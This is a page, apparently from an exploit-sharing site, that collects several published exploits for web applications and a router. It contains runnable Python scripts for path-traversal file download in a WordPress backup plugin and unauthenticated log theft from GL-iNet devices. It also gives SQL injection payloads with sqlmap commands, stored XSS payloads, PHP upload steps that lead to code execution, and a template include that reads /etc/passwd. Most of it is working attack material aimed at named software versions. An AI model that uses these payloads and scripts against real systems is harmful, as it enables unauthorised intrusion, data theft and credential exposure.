# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal # Date: 2024-03-06 # Exploit Author: Ven3xy # Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.10 # Tested on: Linux import sys import requests from urllib.parse import urljoin import time def exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and response.headers.get('Content-Disposition') \ and 'attachment; filename' in response.headers['Content-Disposition'] \ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0: print(response.text) # Replace with the desired action for the downloaded content file_path = f'simplebackup_{file_name}' with open(file_path, 'wb') as file: file.write(response.content) print(f'File saved in: {file_path}') else: print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <file_name> <depth>") sys.exit(1) target_url = sys.argv[1] file_name = sys.argv[2] depth = int(sys.argv[3]) print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n") time.sleep(5) exploit(target_url, file_name, depth)
HireHackking

OpenCart Core 4.0.2.3 - 'search' SQLi

HACKER · %s · %s

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://github.com/opencart/opencart/releases # Version: 4.0.2.3 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=product/search&search=test - New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs =========== Output : Parameter: search (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=product/search&search=') AND 2427=2427-- drCa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
HireHackking

GL-iNet MT6000 4.5.5 - Arbitrary File Download

HACKER · %s · %s

# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'} def DoesTarExist(): r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h) if r.status_code == 200: f = open("logread.tar", "wb") f.write(r.content) f.close() print("[*] Full logs archive `logread.tar` has been downloaded!") print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!") return True else: print("[*] The `logread.tar` archive does not exist however ... try again later!") return False def isVulnerable(): r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h) if r1.status_code == 500 and "nginx" in r1.text: r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h) if "Admin-Token" in r2.text: j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]} r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h) ver = r3.json()['result']['firmware_version'] model = r3.json()['result']['model'] if ver.startswith(('4.')): print("[*] Firmware version (%s) is vulnerable!" %ver) print("[*] Device model is: %s" %model) return True print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!") return False def isAlive(): try: r = requests.get(url, verify=False, timeout=30, headers=h) if r.status_code != 200: print("[*] Make sure the target's web interface is accessible!") return False elif r.status_code == 200: print("[*] The target is reachable!") return True except Exception: print("[*] Error occurred when connecting to the target!") pass return False if __name__ == '__main__': if len(sys.argv) != 2: print("exploit.py url") sys.exit(0) url = sys.argv[1] url = url.lower() if not url.startswith(('http://', 'https://')): print("[*] Invalid url format! It should be http[s]://<domain or ip>") sys.exit(0) if url.endswith("/"): url = url.rstrip("/") print("[*] GL.iNet Unauthenticated Full Logs Downloader") try: if (isAlive() and isVulnerable()) == (True and True): DoesTarExist() except KeyboardInterrupt: print("[*] The exploit has been stopped by the user!") sys.exit(0)
HireHackking
# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name','middle_initial' ,'last_name'" in /receptionist.php component. # POC: 1. Go to the User Login page: " http://localhost/HospitalManagementSystem-gh-pages/ 2. Login with "r1" ID which is redirected to " http://localhost/HospitalManagementSystem-gh-pages/receptionist.php" endpoint. 3. In Patient information functionality add this payload "><script>alert('1')</script> ,in all parameter. 4. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
HireHackking
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php 2. Now login with default username=mayuri.infospace@gmail.com and Password=admin 3. Now go to "http://127.0.0.1/fuelflow/admin/web.php" 4. Upload the san.php file in "Image" field 5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page 6. The content of san.php file is given below: <?php phpinfo();?> # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
HireHackking

LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?> 4 ) After click install you will be see result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
HireHackking

FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)

HACKER · %s · %s

Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum forum. Navigate to the FoF Pretty Mail extension settings. Edit the email default template and insert the following payload at the end of the template: {{ include('/etc/passwd') }} Save the changes to the email template. Trigger any action that sends an email, such as user registration or password reset. The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
HireHackking

Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security. ### Affected Components: > add-tracker.php, update-tracker.php Vulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat ### Description: > Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page. ## Proof of Concept: The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability. Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 175 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true) ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
HireHackking

Daily Habit Tracker 1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` ![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true) ### SQLMap Save the following request to `delete_tracker.txt`: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
HireHackking

Daily Habit Tracker 1.0 - Broken Access Control

HACKER · %s · %s

# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-tracker.php, delete-tracker.php, update-tracker.php ### Description: > Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials. ## Proof of Concept: ### Unauthenticated Access to Home page > To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page. ### Create Tracker as Unauthenticated User To create a tracker, use the following request: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ### Update Tracker as Unauthenticated User To update a tracker, use the following request: ``` POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes ``` ### Delete Tracker as Unauthenticated User: To delete a tracker, use the following request: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.